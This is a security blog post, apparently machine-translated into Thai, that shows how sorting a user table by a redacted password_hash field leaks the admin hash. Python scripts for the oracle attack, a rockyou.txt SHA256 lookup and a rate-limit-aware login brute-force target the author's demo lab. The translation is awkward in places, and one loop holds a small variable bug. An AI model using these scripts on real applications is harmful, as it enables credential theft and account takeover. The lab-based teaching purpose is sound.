จัดเรียงวิธีการของคุณเพื่อขโมยรหัสผ่าน

May 09 2023
บทนำ เมื่อเร็ว ๆ นี้ ฉันพบช่องโหว่เฉพาะที่อนุญาตให้ฉันทำการแยกรหัสผ่านแฮช แม้ว่าดูเหมือนว่าข้อมูลจะถูกแก้ไขอย่างถูกต้องก็ตาม เพื่อแสดงให้เห็นถึงผลกระทบในทางปฏิบัติของช่องโหว่นี้ ฉันได้พัฒนาสคริปต์ที่ใช้วิธีเปรียบเทียบอักขระต่ออักขระ โดยค่อยๆ สร้างแฮชรหัสผ่านของผู้ดูแลระบบโดยแยกประเภทผู้ใช้และสังเกตตำแหน่งของผู้ใช้
ถอดรหัสแฮชรหัสผ่านของผู้ดูแลระบบ SHA256

การแนะนำ

เมื่อเร็ว ๆ นี้ฉันพบช่องโหว่เฉพาะที่ทำให้ฉันทำการสกัดรหัสผ่านได้ แม้ว่าข้อมูลจะถูกแก้ไขอย่างถูกต้องก็ตาม

เพื่อแสดงให้เห็นถึงผลกระทบในทางปฏิบัติของช่องโหว่นี้ ฉันได้พัฒนาสคริปต์ที่ใช้วิธีเปรียบเทียบอักขระต่ออักขระ โดยค่อยๆ สร้างแฮชรหัสผ่านของผู้ดูแลระบบโดยแยกประเภทผู้ใช้และสังเกตตำแหน่งของผู้ใช้ วิธีการนี้แม้จะใช้เวลานาน แต่นำเสนอโอกาสพิเศษในการถอดรหัสแฮชรหัสผ่าน SHA256 โดยไม่ต้องอาศัยเทคนิคการบังคับเดรัจฉานแบบดั้งเดิม

การสำรวจเว็บแอปพลิเคชัน

เพื่อแสดงช่องโหว่นี้ ฉันได้สร้างเว็บแอปพลิเคชันสาธิตที่จำลองข้อบกพร่องด้านความปลอดภัยนี้ การสาธิตนี้ได้รับการเทียบท่าและสามารถดาวน์โหลดได้ที่นี่หากคุณต้องการลองใช้กับเครื่องของคุณเอง เว็บแอปพลิเคชันมีลักษณะดังนี้:

เว็บไซต์สาธิต

แอปพลิเคชันเป็นแบบพื้นฐาน ประกอบด้วยตารางผู้ใช้ที่มีตัวเลือกในการจัดเรียง เพิ่มผู้ใช้ใหม่ และลบผู้ใช้ทั้งหมด ในสถานการณ์จริง ฟังก์ชันนี้น่าจะล้ำหน้ากว่าและปลอดภัยหลังการรับรองความถูกต้อง

ค้นหาจุดบกพร่อง

ขณะดำเนินการตามระเบียบวิธีรักษาความปลอดภัยของเว็บแอปพลิเคชันมาตรฐาน ฉันสังเกตเห็นสิ่งที่น่าสนใจเมื่อพูดถึงตารางผู้ใช้ การใช้ Burp Suite ทำให้ฉันเห็นว่ามีการส่งคำขอเมื่อฉันดูหน้า index.html ที่จัดเรียงผู้ใช้ในตาราง:

ตอนนี้ นี่ไม่ใช่สิ่งที่ผิดปกติเป็นพิเศษ แต่หลังจากลองวิธีต่างๆ ในการจัดเรียงคอลัมน์ ฉันพบว่าตำแหน่งผู้ใช้เปลี่ยนไปเมื่อฉันจัดเรียงด้วยpassword_hash !

มันค่อนข้างแปลก เนื่องจากในภาพหน้าจอด้านบน แฮชทั้งหมดถูกREDACTEDดังนั้น จึงไม่ควรเปลี่ยนตำแหน่งเมื่อจัดเรียงตามฟิลด์นั้น??

เพื่อหาสาเหตุที่สิ่งนี้เกิดขึ้น ฉันได้วิเคราะห์โค้ดและพบสิ่งนี้:

# Getting users for the table on index.html
@app.route('/users')
def get_users():
    sort_col = request.args.get('sort_col', default='id')
    sort_order = request.args.get('sort_order', default='asc')

    sorted_users = sorted(
        users, key=lambda u: u[sort_col], reverse=(sort_order == 'dec'))

    redacted_users = []
    for user in sorted_users:
        redacted_user = user.copy()
        redacted_user['password_hash'] = 'REDACTED'
        redacted_users.append(redacted_user)

    return jsonify(redacted_users)

ในทางทฤษฎี หากเรารู้หรือเดากลไกการแฮชรหัสผ่านได้ (ปกติคือ SHA256, MD5 หรือ bcrypt) เราสามารถสร้างผู้ใช้ใหม่ด้วยรหัสผ่านที่เรารู้ว่าแฮชคืออะไร และใช้รหัสผ่านนั้นในการเรียงลำดับผู้ใช้เพื่อระบุ รหัสผ่านของผู้ดูแลระบบ

ในแผนภาพด้านบน รหัสผ่านของผู้ดูแลระบบคือโดนัทซึ่งมีแฮช SHA256 เป็น2f63371bea3c61d9fdba4469984bd22f2cc2381d23e031634f0387bdd97bd28f
เป้าหมายของฉันคือส่งคืนผู้ใช้ที่เป็นผู้ดูแลระบบในรายการก่อนหน้าฉัน เมื่อสิ่งนั้นเกิดขึ้น ฉันรู้ว่าแฮชของฉันเริ่มต้นด้วยค่าก่อนผู้ดูแลระบบ ดังนั้นในกรณีข้างต้น แฮชของฉันน้อยกว่าผู้ดูแลระบบ ดังนั้นจึงส่งคืน [ฉัน ผู้ดูแลระบบ]

ในไดอะแกรมนี้ ฉันอัปเดตรหัสผ่านเป็น 72yY2GEp41 ซึ่งส่งผลให้แฮช SHA256 เป็น240ba23967c8a19f98e7315b1198b1aebd203836435c5f0d03dbfd84d11853db เมื่อเรียกใช้ ฟังก์ชัน check()ฉันยังคงเป็นอันดับแรกในรายการ อย่างไรก็ตาม ฟังก์ชันกำลังตรวจสอบว่าอักขระตัวแรกเหมือนกันกับ "2" == "2" จากนั้นตรวจสอบอักขระถัดไป "f" > "4" ซึ่งจะส่งคืนค่าแฮชของฉันก่อน

สุดท้าย เมื่อแฮชรหัสผ่านของฉันขึ้นต้นด้วยอักขระ "3" ซึ่งมากกว่าแฮชรหัสผ่านของผู้ดูแลระบบซึ่งขึ้นต้นด้วย "2" ดังนั้น ผู้ดูแลระบบจะกลับมาเป็นอันดับแรกในรายการ และเราสามารถระบุได้ว่าแฮชรหัสผ่านของผู้ดูแลระบบมี "2" ในช่องดัชนี[0] ! เจ๋งไปเลย! ตอนนี้ให้เปลี่ยนทฤษฎีนี้เป็นรหัส

เปลี่ยนทฤษฎีเป็นรหัส

วิธีแก้ไขปัญหาของฉันค่อนข้างช้า ดังนั้นหากคุณทราบวิธีที่มีประสิทธิภาพมากกว่านี้ โปรดแสดงความคิดเห็นและแจ้งให้เราทราบ!

กระบวนการที่ฉันใช้เพื่อแยกแฮชรหัสผ่านของผู้ดูแลระบบมีดังนี้:

  1. เขียนฟังก์ชันบางอย่างสำหรับสร้างผู้ใช้ใหม่ด้วยรหัสผ่านที่ฉันเลือก ล้างตารางผู้ใช้ และจัดเรียงผู้ใช้ รหัสที่ฉันสร้างขึ้นมีดังต่อไปนี้:
  2. domain = "lab.prodefense.io"
    def create_user(email='[email protected]', name='matt', password='hackyhack'):
        url = f"http://{domain}/users"
        json = {"email": email, "name": name, "password": password}
        requests.post(url, json=json)
    
    
    def clear_users():
        url = f"http://{domain}/users"
        requests.delete(url)
    
    
    def sort_users(direction='asc'):
        url = f"http://{domain}/users?sort_col=password_hash&sort_order={direction}"
        r = requests.get(url)
        return r.text
    

    คัดลอกเป็น python-requests Burp Suite ส่วนขยาย

2. ต่อไป ฉันสร้างฟังก์ชันชื่อcheck()เพื่อดูว่าการตอบกลับ json จาก ฟังก์ชัน sort_users()ส่งคืนตารางผู้ใช้ที่มีผู้ใช้ที่เป็นผู้ดูแลระบบเป็นอันดับแรกในรายการ หรือเป็นลำดับที่สอง :

def check():
    users = json.loads(sort_users())
    return users[0]['id'] == 1

3. ตอนนี้ฉันต้องสามารถค้นหาแฮช SHA256 ที่ขึ้นต้นด้วยคำนำหน้า และส่งคืนทั้งสตริงที่ใช้สร้างแฮชนั้นและตัวแฮชเอง
ตัวอย่างเช่น ถ้าฉันรู้ว่า admin_hash ของฉันคือ: 8c 6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918

จากนั้นสิ่งที่ฉันต้องทำคือสร้างแฮชที่ฉันสามารถใช้เพื่อเรียงลำดับได้ ดังนั้น my_hash อาจมีลักษณะดังนี้: 87 227afead5d3d1a5b89bf07a673510114b1d98d473d43e0ff7e3b230032311e แนวคิดนี้คือเนื่องจากฉันสามารถจัดเรียงฐานข้อมูลได้ ฉันจึงสามารถระบุได้ว่า admin_hash นั้นขึ้นหรือลงเมื่อเทียบกับ my_hash ดังนั้น8c6976e... จะแสดงก่อน 87227af...เพราะ8' s เท่ากัน แต่"c"มาก่อน " 7"หากการเรียงลำดับของฉันเป็นค่าจากมากไปน้อย รับความคิด?

ตอนนี้สิ่งที่ฉันต้องทำคือไปทีละตัวอักษร สร้างแฮชที่มีคำนำหน้าจนกว่าฉันจะมีทั้งรหัสผ่านแบบข้อความธรรมดาและแฮชของผู้ดูแลระบบ ในการทำเช่นนั้นรหัสของฉันมีลักษณะดังนี้:

def gen_hash(prefix):
    while True:
        random_string = ''.join(random.choices(
            string.ascii_letters + string.digits, k=10))
        sha256_hash = hashlib.sha256(random_string.encode()).hexdigest()
        if sha256_hash.startswith(prefix):
            return random_string, sha256_hash

4. เมื่อฉันให้ฟังก์ชันนี้ทำงาน สิ่งสุดท้ายที่ฉันต้องการคือตรรกะในการฟัซอักขระทีละอักขระ จนกว่าจะได้แฮชที่ตรงกับผู้ดูแลระบบ! ในการทำเช่นนี้รหัสของฉันดูเหมือน:

if __name__ == '__main__':
    # SHA256 hashes can only have 0-9, a-f which limits our bank significantly. 
    bank = '0123456789abcdef'
    value = []
    # 64 chars is the length of a SHA256 hash
    while len(value) <= 64:
        found_match = False
        for char in bank:
            # Sends the POST request to clear all users but admin
            clear_users()
            # Ill talk about the 'ff' below :sad-doge:
            rand_string, hash = gen_hash("".join(value) + char + 'ff')
            # Creates a new user, with the random string that has our prefix
            create_user(password=rand_string)
            # Checking to see if admin comes first or second in the table
            if check():
                value.append(char)
                found_match = True
                break
            # Adds some animation because who likes boring CLIs
            print(f"[!] ADMIN HASH: {''.join(value)}{char}", end='\r')
            time.sleep(0.1)
        if not found_match:
            value.append('0' if not value else 'f')

    print("\n[!] FINAL ADMIN HASH: " + ''.join(value))

โดยรวมแล้ว หากคุณรวมโค้ดทั้งหมดเข้าด้วยกัน คุณจะเห็นบางอย่างเช่น GIF ด้านล่างในคอนโซลของคุณ:

คุณสามารถเห็นใน GIF ว่าฉันได้รับอักขระเพียงไม่กี่ตัว จากนั้นมันก็เริ่มช้าลงจริงๆ นั่นเป็นเพราะเราค่อนข้างดุรหัสผ่านผู้ใช้ที่เป็นผู้ดูแลระบบ นี่เป็นข้อจำกัดใหญ่ และผู้โจมตีอาจต้องใช้เวลามากในการสร้างรหัสผ่าน ข้อแตกต่างเพียงอย่างเดียวระหว่างสิ่งนี้กับ Bruteforce ทั่วไปคือข้อจำกัดนั้นเกิดจากพลังการคำนวณในคอมพิวเตอร์ของคุณ การค้นหาแฮชที่ขึ้นต้นด้วยอักขระ 5 ตัวขึ้นไปนั้นใช้เวลานาน เว้นแต่คุณจะคำนวณแฮชไว้ล่วงหน้าหรือมีตารางสายรุ้งขนาดใหญ่ให้ค้นหา โดยรวมแล้ว การรับ bruteforce อย่างเต็มรูปแบบเช่นนี้น่าจะต้องใช้คำขอประมาณ 500 รายการไปยังเซิร์ฟเวอร์ และคุณต้องสร้างสตริงเป็นตันเพื่อรับค่าแฮชที่ถูกต้อง

ไม่ใช่ Bruteforce ทั่วไปของคุณ

แอปพลิเคชันสาธิตสร้างขึ้นในการจำกัดอัตราด้วย 200 req/hr บน endpoints หลัก และ 20 req/hr บน endpoint การล็อกอิน เมื่อคำนึงถึงสิ่งนี้ การโจมตีแบบเดรัจฉานอาจต้องใช้คำขอหลายล้านครั้งในการเดารหัสผ่าน แต่ถ้าฉันบอกคุณว่าเราสามารถทำได้โดยมีคำขอน้อยกว่า 200 รายการ ให้ดำดิ่งลงไปในวิธีการทำงาน

คล้ายกับวิธีที่ฉันใช้กับสคริปต์ Solve.py ตัวแรก ในวิธี นี้เราจะถือว่ารหัสผ่านถูกสุ่มเลือกจากrockyou.txt ตอนนี้มันโกงไปหน่อย แต่rockyou.txtมีรหัสผ่าน 14,344,394 (14 ล้าน) ในรายการ เราจะต้อง "เดา" รหัสผ่านในคำขอที่ต่ำกว่า 200 เพื่อหลีกเลี่ยงการตรวจจับและการจำกัดอัตรา มาเริ่มกันเลย.

  1. คล้ายกับสคริปต์ Solve.py ตัวแรก ฉันจะใช้ฟังก์ชันเดียวกันกับที่โต้ตอบกับเว็บแอปพลิเคชัน แต่ฉันจะสร้างฟังก์ชันการเข้าสู่ระบบด้วย:
  2. domain = "lab.prodefense.io"
    def create_user(email='[email protected]', name='matt', password='hackyhack'):
        url = f"http://{domain}/users"
        json = {"email": email, "name": name, "password": password}
        requests.post(url, json=json)
    
    
    def clear_users():
        url = f"http://{domain}/users"
        requests.delete(url)
    
    
    def sort_users(direction='asc'):
        url = f"http://{domain}/users?sort_col=password_hash&sort_order={direction}"
        r = requests.get(url)
        return r.text
    
    
    def login(username, password):
        url = f"http://{domain}/login"
        json = {"username": username, "password": password}
        r = requests.post(url, json=json)
        return r.status_code
    

import hashlib

with open('rockyou.txt', 'r', encoding='utf-8') as input_file:
    with open('combined.txt', 'w') as output_file:
        for line in input_file:
            line = line.strip()
            hashed_line = hashlib.sha256(line.encode()).hexdigest()
            output_file.write(f'{hashed_line},{line}\n')

print('Conversion completed. Check combined.txt file.')

แฮชรหัสผ่าน rockyou.txt ใน SHA256 รูปแบบรหัสผ่าน

2. ตอนนี้ฉันจำเป็นต้องเขียนฟังก์ชันที่สามารถทำงานคล้ายกับ ฟังก์ชัน gen_hash(คำนำหน้า) ของฉัน แต่ต้องสแกนผ่านไฟล์ combination.txt ใหม่ของเราเพื่อค้นหาแฮชที่อาจเป็นแฮชรหัสผ่านของผู้ใช้ตามคำนำหน้า ฉันพนันได้เลยว่าคุณจะเห็นว่าตอนนี้ฉันกำลังทำอะไรอยู่ :)

def find_hashes(prefix):
    hashes = []
    passwords = []
    with open('combined.txt', 'r', errors='replace') as file:
        for line in file:
            line = line.strip()
            if line.startswith(prefix):
                values = line.split(',')
                if len(values) == 2:
                    sha256, password = values
                    hashes.append(sha256)
                    passwords.append(password)

    return hashes, passwords

3. หน้า /เข้าสู่ระบบอนุญาตเพียง 20 ครั้ง/ชม. ดังที่ได้กล่าวไปแล้ว ฉันต้องได้รับค่านำหน้าของฉันให้นานพอที่จะเรียกฟังก์ชันfind_hashes()และให้ส่งคืนรหัสผ่าน 20 (หรือน้อยกว่า) ที่เริ่มต้นด้วยค่านำหน้าที่กำหนด

Possible password hashes (notice they all start with the prefix):

hash_prefix: "b60d9"
     055555:b60d92f92101e5210a530631ec3ad59c32ecdc3fd3ab75ac1291cedcaf6fee77
  cordelius:b60d914e40a9572820f571d8cf38e8425742a8a1cd6c5586f35a6c7e73e39dcf
    terfase:b60d920aa0cabdbdcf7447632bcdb9456a35c4378db17137066aee36d3aeea12
     obolku:b60d9db875658b618b27f0a2d4c869628a9f937ea6c1a0172d4a6acc2f219846
escuelapan2:b60d9852d3325c01b7556719dd1e9b684017b8306fc1902eb9e6298250459735
...etc...

def bruteforce(password_list):
    for pwd in password_list:
        if login('admin', pwd) == 200:
            print(
                f"[!] ADMIN PASSWORD: {colored(pwd, 'green')}")
    sys.exit(0)

if __name__ == '__main__':
    api_call_count = 0
    prefix = ""
    bank = '0123456789abcdef'
    for i in range(10):
        found_match = False
        for char in bank:
            clear_users()
            pwd, hash_value = gen_hash(prefix+char+'f')
            create_user(password=pwd)
            api_call_count += 3
            if check():
                found_match = True
                prefix += char
                tmp_hashes, tmp_passwords = find_hashes(prefix)
                if (len(tmp_hashes) < 20):
                    print(
                        f"[!] PARTIAL ADMIN HASH: {colored(prefix, 'green')}")
                    bruteforce(tmp_passwords)
                break
            print(
                f"[!] FINDING HASH: {prefix}{colored(char, 'red')}   -   [INFO] API Calls Sent: {api_call_count}/200'", end='\r')
            time.sleep(0.2)
        if not found_match:
            hash += 'f' if hash else '0'

ถอดรหัสรหัสผ่านแบบสุ่มจาก rockyou.txt ด้วยคำขอ 87 รายการ

สคริปต์ Solve.py นี้ใช้เวลา 2 นาที 30 วินาที และใช้คำขอ 87 รายการ แฮชรหัสผ่านนั้นสุ่มอย่างสมบูรณ์ใน รายการคำศัพท์ ของ rockyou.txtซึ่งมีรหัสผ่าน 14,344,394 (14 ล้าน)

บทสรุป

แม้ว่าเว็บแอปพลิเคชันสาธิตของฉันอาจไม่ได้รับรางวัลใด ๆ สำหรับ "เว็บแอปที่ปลอดภัยที่สุดแห่งปี" แต่ก็แสดงให้เห็นอย่างชัดเจนว่าข้อบกพร่องบางประเภทนั้นมีลักษณะเฉพาะตัวได้อย่างไร และเหตุใด chatGPT จึงไม่รับงานของฉันในเร็วๆ นี้

นอกเหนือจากเรื่องตลกแล้ว ช่องโหว่นี้ที่ช่วยให้ผู้โจมตีสามารถค้นหารหัสผ่านที่ถูกขโมยได้ จะช่วยชี้ให้เห็นถึงความเสี่ยงที่อาจเกิดขึ้นซึ่งซ่อนอยู่ภายในฟังก์ชันการทำงานที่ดูเหมือนไม่เป็นอันตราย ด้วยการวิเคราะห์อย่างถี่ถ้วนและแนวทางที่ชาญฉลาด ผู้โจมตีสามารถแยกแฮชรหัสผ่านจากเว็บแอปพลิเคชันที่มีช่องโหว่ได้หากไม่ระมัดระวัง

หมายเหตุ: หากคุณชอบบล็อกโพสต์นี้และต้องการลองสร้างสคริปต์โซลูชันของคุณเอง เราได้สร้างคอนเทนเนอร์นักเทียบท่าที่สร้างรหัสผ่านผู้ดูแลระบบแบบสุ่มซึ่งสามารถดาวน์โหลดได้ที่นี่ มีความสุขในการแฮ็ก !